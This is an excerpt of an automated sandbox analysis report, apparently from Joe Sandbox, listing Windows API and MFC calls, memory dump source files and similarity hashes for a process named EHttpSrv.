                                                                                                                • #1176.MFC80U(?,20435667), ref: 20438A49
                                                                                                                • #6282.MFC80U(?,?,?,?,?,?,20435667), ref: 20438A80
                                                                                                                • #5316.MFC80U(?,?,?,?,?,?,20435667), ref: 20438ABC
                                                                                                                • #1172.MFC80U(00000003,00000000,?,?,?,?,?,?,20435667), ref: 20438AD8
                                                                                                                • #764.MFC80U(?,00000003,00000000,?,?,?,?,?,?,20435667), ref: 20438AE8
                                                                                                                • #265.MFC80U(00000000,00000003,00000000,?,?,?,?,?,?,20435667), ref: 20438B0A
                                                                                                                • memset.MSVCR80 ref: 20438B29
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1172#1176#265#5316#6282#764memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3381220976-0
                                                                                                                • Opcode ID: d024e478ef35a841cad81b9426e116e3315bd944f4411aceb219fae319504730
                                                                                                                • Instruction ID: bf20848afa7e4fd66a1a797804d1d0c7eadc0c465d518c05ff1c10985fcbfe0d
                                                                                                                • Opcode Fuzzy Hash: d024e478ef35a841cad81b9426e116e3315bd944f4411aceb219fae319504730
                                                                                                                • Instruction Fuzzy Hash: C02128723013054BE620AFE49C45B9BB3599F94B60F60C61EFA1947AD0EA7CE90587A1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5149#5398$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 180633984-0
                                                                                                                • Opcode ID: 98d6e08747b58175edc8de0211b6bc34471b3f46bfc46e5587e545123c05fc96
                                                                                                                • Instruction ID: 4d7bf4a7517d6a98d7be27a3230b32b6c0188237c0bd57952305acd3f7769b65
                                                                                                                • Opcode Fuzzy Hash: 98d6e08747b58175edc8de0211b6bc34471b3f46bfc46e5587e545123c05fc96
                                                                                                                • Instruction Fuzzy Hash: BD31E3713047019BD7148F64CC85BAAB7A5BB94B28F10872DF466577D0DF38A808C792
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5149#5398$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 180633984-0
                                                                                                                • Opcode ID: 709f66a4117406ca6d6d34b38997a045ea813d83459dce7f719479f88577e3ac
                                                                                                                • Instruction ID: 483a925638e855082552fd50976feeb080d5bc34dbf6352f9900ef8d0743a9c5
                                                                                                                • Opcode Fuzzy Hash: 709f66a4117406ca6d6d34b38997a045ea813d83459dce7f719479f88577e3ac
                                                                                                                • Instruction Fuzzy Hash: CA31C2312047029BD7148F64DC85BAABBA5BB98728F10873DF566473D0DF38A808C791
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • \StringFileInfo\%04X%04X\%s, xrefs: 20410E63
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$QueryValuelstrcpynwsprintf
                                                                                                                • String ID: \StringFileInfo\%04X%04X\%s
                                                                                                                • API String ID: 3128287595-3176804452
                                                                                                                • Opcode ID: 3c0e6aa56a169eea6ca0dda9920636210079d7c0bc2b52ee6a1792caa3739355
                                                                                                                • Instruction ID: fc621e41e0b6f7a248fb3d8dc6ec6a1377c4a68bc81ad14f51c872d7764165fd
                                                                                                                • Opcode Fuzzy Hash: 3c0e6aa56a169eea6ca0dda9920636210079d7c0bc2b52ee6a1792caa3739355
                                                                                                                • Instruction Fuzzy Hash: C021D6B1504325ABC314DB96CC44FA7F7E8AF68B05F00C92DBA0997250DBB9E94487D5
                                                                                                                APIs
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,00020008,00000000,?,?,2044A3EC), ref: 2043DCA6
                                                                                                                • CloseHandle.KERNEL32(?,?), ref: 2043DCC9
                                                                                                                • CloseHandle.KERNEL32(00000000,?,2044A3EC), ref: 2043DCCC
                                                                                                                  • Part of subcall function 2043DB70: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000408,?,00000000,00000000,76232EE0), ref: 2043DBB9
                                                                                                                  • Part of subcall function 2043DB70: LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 2043DBEC
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,00000000,?,2043DD55,?,00000000,?,2044A3EC), ref: 2043DCDE
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00020008,?,?,2044A3EC), ref: 2043DCF5
                                                                                                                • CloseHandle.KERNEL32(?,?), ref: 2043DD18
                                                                                                                • CloseHandle.KERNEL32(00000000,?,2044A3EC), ref: 2043DD1B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenToken$Process$AccountInformationLookupThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2379517368-0
• Opcode ID: ffa320f2e2dddec958b9ccbc10619eb6b4d988d711617833b0ec466f2450dc13
• Instruction ID: 77ace5bbacb9f4f7b807782b2e5576dc0f924ed73937b2c6fd6a01b8e3c90a5d
• Opcode Fuzzy Hash: ffa320f2e2dddec958b9ccbc10619eb6b4d988d711617833b0ec466f2450dc13
• Instruction Fuzzy Hash: ED11AC712047116BD301CBA49C85E3BB7ACEF89A86F20891DFA1187240DB78EC0597A5
APIs
• DestroyCursor.USER32(?), ref: 204311C1
• #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
• #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
• #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
• #745.MFC80U ref: 20431250
• #578.MFC80U ref: 2043125D
• #741.MFC80U ref: 2043126D
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #578#745$#741#764CursorDestroy
• String ID:
• API String ID: 3925348513-0
• Opcode ID: 197ff15cbbc536f4c8d649963d6329e935b72bd93f72a301cd583617f43cb2c5
• Instruction ID: 83450769d22ba5ea2da18077b8e71055b68bb0ae34810d94dd1e9f3b960c75f6
• Opcode Fuzzy Hash: 197ff15cbbc536f4c8d649963d6329e935b72bd93f72a301cd583617f43cb2c5
• Instruction Fuzzy Hash: AF214D700087818ED315DF64D944B9BBBE4AB54A18F108D1DF0D697690DB79A908CBA3
APIs
• #310.MFC80U(FEEA6C22,?,00000000,?,00000000,2047C2A9,000000FF,204610AA,00000000), ref: 20460EB9
• #6232.MFC80U(00000001,?,00000000,?,00000000,2047C2A9), ref: 20460ECB
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20460EE6
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 20460EF7
• #4026.MFC80U(0000029B,?,00000000,?,00000000,2047C2A9), ref: 20460F2B
• #5803.MFC80U(00000413,?,?,00000000,?,00000000,2047C2A9), ref: 20460F3D
• #578.MFC80U(?,00000000,?,00000000,2047C2A9), ref: 20460F4E
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: MessageSend$#310#4026#578#5803#6232
• String ID:
• API String ID: 1927394422-0
• Opcode ID: 6d79880abb2d890cd9b834e26bed755587d6767e3dc2070f059ac3f25da627e8
• Instruction ID: f4d91fef00b462b39b8f7165b100f23ca1ca97f6120ade2b4f677b82167f9e61
• Opcode Fuzzy Hash: 6d79880abb2d890cd9b834e26bed755587d6767e3dc2070f059ac3f25da627e8
• Instruction Fuzzy Hash: 79118171208740ABE324DB54CC45FABB7A4EB84711F108A2DF551873E0EBBCA9048A55
APIs
• #3793.MFC80U(?,?,?), ref: 20436B5D
• #2870.MFC80U(00000000,?,00000001,?,?,?), ref: 20436B75
• PtInRect.USER32(?,?,?), ref: 20436B84
• SendMessageW.USER32(0000006E,0000110B,00000009,00000000), ref: 20436B9A
• #1894.MFC80U(?,?,?), ref: 20436BA2
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #1894#2870#3793MessageRectSend
• String ID: n
• API String ID: 884959302-2013832146
• Opcode ID: 5866f101f56c324c047dc9070cf5a48073e1388c4ebbad63f5b795759658d119
• Instruction ID: 71019f4995f92062321f6225cc7bfc0385661450bec6320917ff5e80ad3be0bc
• Opcode Fuzzy Hash: 5866f101f56c324c047dc9070cf5a48073e1388c4ebbad63f5b795759658d119
• Instruction Fuzzy Hash: E701D6762042047BC714DB94DC81FAFB7ACABC8B28F00C61DFA45C6281DA74ED0087B5
APIs
• #591.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A0D9
• #620.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A0E9
• #620.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A0F9
• #591.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A109
• #587.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A119
• #587.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A129
• #718.MFC80U(FEEA6C22,?,00000000,20479F3C,000000FF,204268E1,?,?,?), ref: 2042A138
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #587#591#620$#718
• String ID:
• API String ID: 779086787-0
• Opcode ID: 55dc9b1225ac67a39df09c050b186613a022d060eedc91c6ed3d9f0b6e735293
• Instruction ID: 4bfbe0f9ee4b9d9f74dec981ebf672b7e5bbcb66592917bebe203b0f831196a0
• Opcode Fuzzy Hash: 55dc9b1225ac67a39df09c050b186613a022d060eedc91c6ed3d9f0b6e735293
• Instruction Fuzzy Hash: 6D113C700087819BC325DF64C855BEABBE0FFA1714F44CE1DE0A6476A0DBB86609C792
APIs
• #6232.MFC80U(00000001,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000,FEEA6C22), ref: 20455FD5
• #2651.MFC80U(000004BD,?,00000001,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 20455FE8
• #2155.MFC80U(000004BD,?,00000001,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 20455FEF
• #2651.MFC80U(000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 20456002
• #2155.MFC80U(000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 20456009
• #2651.MFC80U(000004B8,?,000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 2045601C
• #2155.MFC80U(000004B8,?,000004BA,?,000004BD,?,00000001,00000000,?,?,?,00000000), ref: 20456023
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2155#2651$#6232
• String ID:
• API String ID: 793604035-0
• Opcode ID: 6a4a98f91e42ad9ab78f089853cadf76208eceae4a662d1b7703a0546b412162
• Instruction ID: 863103f26e4ca1df73b264e5c76b513539e611b8e07b13662bb66614aa416b65
• Opcode Fuzzy Hash: 6a4a98f91e42ad9ab78f089853cadf76208eceae4a662d1b7703a0546b412162
• Instruction Fuzzy Hash: C2E0ED717C0B105AE95853F05816BFF217ACB92F04FC0C51CB2565FAE0DE6D9D428394
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: mallocmemset
• String ID:
• API String ID: 2882185209-0
• Opcode ID: 16eda0088e1a5efdb71a992086406c3f3cb6e23979dc3489307c2ce772580dd1
• Instruction ID: 4e0b3dd741fcd93010f2d198cb1a9cbd8eb2462f2375d9f8cd808f0600696381
• Opcode Fuzzy Hash: 16eda0088e1a5efdb71a992086406c3f3cb6e23979dc3489307c2ce772580dd1
• Instruction Fuzzy Hash: 7A212EB15047045BC720CF999CC196BBBF8BB99604F50893EE599D3700D739EE18CAA6
APIs
• #764.MFC80U(89640C24,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CAB9
• #764.MFC80U(CCCC0006,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CAD2
• #764.MFC80U(3274046E,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CAEB
• #764.MFC80U(E5E2E850,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CB04
• #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CBF8
• #265.MFC80U(00000000,FEEA6C22,?,?,00000000,00000000,?,2047D3CC,000000FF,2040E2F8,?), ref: 2040CC63
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764$#265
• String ID:
• API String ID: 4171483331-0
• Opcode ID: a07db5e2b5ef17b65e2b32640280f0aa3b5643831db1a4af1dde70ad20b809fb
• Instruction ID: 8b597c311dad229945d0d65014c3e31015da35acb0ec0f77e7b8bb510146f47a
• Opcode Fuzzy Hash: a07db5e2b5ef17b65e2b32640280f0aa3b5643831db1a4af1dde70ad20b809fb
• Instruction Fuzzy Hash: 849189B1500304CFCB18CF69C481A56BBF2FF48614B988AADD8096B756CB39F949CF85
APIs
• #314.MFC80U(00000000,FEEA6C22), ref: 2044BFA0
• EnterCriticalSection.KERNEL32(-00003A6C,?), ref: 2044C01A
• EnterCriticalSection.KERNEL32(-00003A6C,?,00000000,81000000,?,?,00000000,?,00000000), ref: 2044C139
• LeaveCriticalSection.KERNEL32(-00003A6C), ref: 2044C1E5
• #6751.MFC80U(00000000,?), ref: 2044C2CD
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: CriticalSection$Enter$#314#6751Leave
• String ID:
• API String ID: 2506506037-0
                                                                                                                • Opcode ID: cd4c29c1b17a92d963c63d2088b7e1b9501995bccafe37cacce562f497645b4d
                                                                                                                • Instruction ID: 1aabffa1d9b2c20e7814515fd4c05f6d6d675276f08e87f32a92343a013f52db
                                                                                                                • Opcode Fuzzy Hash: cd4c29c1b17a92d963c63d2088b7e1b9501995bccafe37cacce562f497645b4d
                                                                                                                • Instruction Fuzzy Hash: BC91D1715087408BD761CFA4C891B9FB7E8BF91B08F10C91DF58997290DB78AA45CBA3
                                                                                                                APIs
                                                                                                                • memmove_s.MSVCR80 ref: 2043F742
                                                                                                                • #1176.MFC80U(FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F7BB
                                                                                                                • #1176.MFC80U(?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F7E0
                                                                                                                • #6282.MFC80U(?,?,?,?,?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F81E
                                                                                                                • #5316.MFC80U(?,?,?,?,?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8,?,?), ref: 2043F854
                                                                                                                • #1172.MFC80U(00000003,00000000,?,?,?,?,?,00000000,FEEA6C22,?,?,?,00000000,2047A185,000000FF,2043F1B8), ref: 2043F870
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176$#1172#5316#6282memmove_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 189992903-0
                                                                                                                • Opcode ID: efa184b823bbe05bf1ea6564afe0f2415fd702c19bf77f4f3cff90be8c8e7e34
                                                                                                                • Instruction ID: 89ce70431d1a0a37f86b060fd4245eb7056398a8d95b8d4857f3a984e6c9254d
                                                                                                                • Opcode Fuzzy Hash: efa184b823bbe05bf1ea6564afe0f2415fd702c19bf77f4f3cff90be8c8e7e34
                                                                                                                • Instruction Fuzzy Hash: 2D51DF7160831A8FC328DF88C880A56B7A5FF58724F29C62DE94887311DB75E905CBD1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042D2E0: #359.MFC80U(00000000,FEEA6C22), ref: 2042D320
                                                                                                                  • Part of subcall function 2042D2E0: memset.MSVCR80 ref: 2042D33C
                                                                                                                  • Part of subcall function 2042D2E0: #3998.MFC80U(?,00000000,FEEA6C22), ref: 2042D370
                                                                                                                  • Part of subcall function 2042D2E0: #6735.MFC80U(?,?,00000000,FEEA6C22), ref: 2042D382
                                                                                                                  • Part of subcall function 2042D2E0: #5832.MFC80U(?,?), ref: 2042D39F
                                                                                                                  • Part of subcall function 2042D2E0: #578.MFC80U(?,?), ref: 2042D3B0
                                                                                                                  • Part of subcall function 2042D2E0: #3828.MFC80U(?,00000000), ref: 2042D3C6
                                                                                                                  • Part of subcall function 2042D2E0: #2011.MFC80U(00000000,FEEA6C22), ref: 2042D3CD
                                                                                                                  • Part of subcall function 2042D2E0: #607.MFC80U(?,00000000), ref: 2042D3E3
                                                                                                                  • Part of subcall function 204179F0: #1176.MFC80U(00000001,?,?,?,20428CCC,?,00000001), ref: 20417A3B
                                                                                                                • #310.MFC80U(?,00000001), ref: 20428CF3
                                                                                                                • #2311.MFC80U(?,2048A5C0,?,?), ref: 20428D34
                                                                                                                • SendMessageW.USER32(?,00000181,-00000001,?), ref: 20428D63
                                                                                                                • SendMessageW.USER32(?,0000019A,-00000001,00000005), ref: 20428D82
                                                                                                                • #2155.MFC80U(00000001), ref: 20428DB1
                                                                                                                • #578.MFC80U ref: 20428DD6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
